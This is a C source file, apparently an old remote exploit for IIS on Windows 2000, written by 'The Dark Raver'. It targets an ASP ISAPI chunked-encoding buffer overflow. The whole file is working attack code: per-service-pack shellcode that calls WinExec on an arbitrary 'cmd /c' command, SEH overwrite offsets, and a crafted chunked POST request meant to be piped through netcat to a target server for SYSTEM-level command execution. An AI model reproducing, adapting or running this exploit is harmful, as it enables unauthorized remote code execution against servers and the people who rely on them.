//
// Remote exploit for win2000 - ASP ISAPI chunked encoding overflow
// The Dark Raver <darkraver@t0s.org>
//

#include <stdio.h>

#define DEBUG   1

#define ASP	"iisstart.asp"

#define OFFSET_SEH0 0x77edf44c // win2000 SP2 + SRP
#define OFFSET_SEH1 0x77ee044c // win2000 SP0
#define OFFSET_SEH2 0x77edf44c // win2000 SP1
#define OFFSET_SEH3 0x77edf44c // win2000 SP2
#define OFFSET_SEH4 0x12345678 // test

#define OFFSET0	0x00477a31 // test1
#define OFFSET1 0x00457a31 // test2
#define OFFSET2 0x00447a31 // test3

#define NOP	"\xeb\x09" // jmp +9
#define ALIGN   0

char hell0[]= // SP2 + SRP
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e"  // movb %bl,0xLEN(%esi)
"\x20" /* Longitud del comando */
"\xb8\x94\xee\xe8\x77" // movl $0x77E8EE94, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x5c\xa9\xe8\x77" // movl $0x77E8A95C, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
//"net send 172.18.1.14 testexploit" // strlen = 32
//"cmd /c copy c:\\boot.ini c:\\a.txt"
//"\x30\x30"
"";

char hell1[]= // SP0
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e"  // movb %bl,0xLEN(%esi)
"\x20" /* Longitud del comando */
"\xb8\x01\x86\xe9\x77" // movl $0x77e98601, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\xbb\xb0\xe9\x77" // movl $0x77e9b0bb, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";

char hell2[]= // SP1
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e"  // movb %bl,0xLEN(%esi)
"\x20" /* Longitud del comando */
"\xb8\x0e\xb5\xe9\x77" // movl $0x77e9b50e, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x2d\xf3\xe8\x77" // movl $0x77e8f32d, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";

char hell3[] = // SP2
"\xeb\x15" // start: jmp back
"\x5e" // popl %esi
"\x56" // push %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x88\x5e"  // movb %bl,0xLEN(%esi)
"\x20" /* Longitud del comando */
"\xb8\xaf\xa7\xe9\x77" // movl $0x77e9a7af, %eax -> WinExec
"\xff\xd0" // call *%eax
"\xb8\x94\x8f\xe9\x77" // movl $0x77e98f94, %eax -> ExitProcess
"\xff\xd0" // call *%eax
"\xe8\xe6\xff\xff\xff" // back: call start
"cmd /c "
"";




main(int argc, char **argv) {
int offset=0, offset_seh=0;
char hell[200];
int i=0;
char len=0;
char buf[4];

if(argc!=4) {
	printf("Remote SYSTEM level exploit for IIS / Win2000\n");
	printf("Sintaxis: ./lluis <windows_type> <offset> <command>\n");
	printf("Uso: ./lluis 0 0 \"net send 172.18.1.14 test\" | nc x.x.x.x 80\n");
	printf("Type 0 - Win2000 SP2 + SRP\n");
	printf("Type 1 - Win2000 SP0\n");
	printf("Type 2 - Win2000 SP1\n");
	printf("Type 3 - Win2000 SP2\n");
	printf("Predefined Offset 0 = 0x00477a31 / 1 = 0x00457a31 / 2 = 0x00447a31\n");
	exit(0);
	}

// Tipos

if(!strcmp(argv[1],"0")) {
	fprintf(stderr, "Using SP2 + SRP values\n");
	offset_seh=OFFSET_SEH0;
	strcpy(hell,hell0);
	}

if(!strcmp(argv[1],"1")) {
	fprintf(stderr, "Using SP0 values\n");
	offset_seh=OFFSET_SEH1;
	strcpy(hell,hell1);
	}

if(!strcmp(argv[1],"2")) {
	fprintf(stderr, "Using SP1 values\n");
	offset_seh=OFFSET_SEH2;
	strcpy(hell,hell2);
	}

if(!strcmp(argv[1],"3")) {
	fprintf(stderr, "Using SP2 values\n");
	offset_seh=OFFSET_SEH3;
	strcpy(hell,hell3);
	}

if(!strcmp(argv[1],"4")) {
	fprintf(stderr, "Using test values\n");
	offset_seh=OFFSET_SEH4;
	strcpy(hell,hell1);
	}

// Offsets

if(!strcmp(argv[2],"0")) {
        fprintf(stderr, "Using offset0\n");
        offset=OFFSET0;
        }

if(!strcmp(argv[2],"1")) {
        fprintf(stderr, "Using offset1\n");
        offset=OFFSET1;
        }

if(!strcmp(argv[2],"2")) {
        fprintf(stderr, "Using offset2\n");
        offset=OFFSET2;
        }

if(offset==0) {
	sscanf(argv[2], "%p", &offset);
	fprintf(stderr, "Using %p\n", offset);
	}

strcat(hell, argv[3]);

hell[8]=(int)strlen(argv[3])+strlen("cmd /c ");

if(DEBUG) fprintf(stderr, "LEN: %d\n", hell[8]);
if(DEBUG) fprintf(stderr, "TOTLEN: %d\n", strlen(hell));

printf("POST /");
printf(ASP);
printf(" HTTP/1.1\r\n");
printf("Accept: */*\r\n");
printf("Host: foobar\r\n");

printf("Content-Type: ");

if(ALIGN==1) printf("x");

for(i=0;i<=1024;i++)
	printf(NOP);

printf("aaaaaaaaaaaa");
printf("%s", hell);
printf("\r\n");

printf("Content-Type: application/x-www-form-urlencoded\r\n");
printf("Transfer-Encoding: chunked\r\n\r\n");
printf("10\r\n");
printf("PPPPPPPPPPPPPPPP\r\n");
printf("4\r\n");

//if(DEBUG) sleep(10);

*(int *)&buf[0]=offset;
for(i=0;i<4;i++)
	putchar(buf[i]);

printf("\r\n4\r\n");

*(int *)&buf[0]=offset_seh;
for(i=0;i<4;i++)
	putchar(buf[i]);

printf("\r\n0\r\n\r\n");

}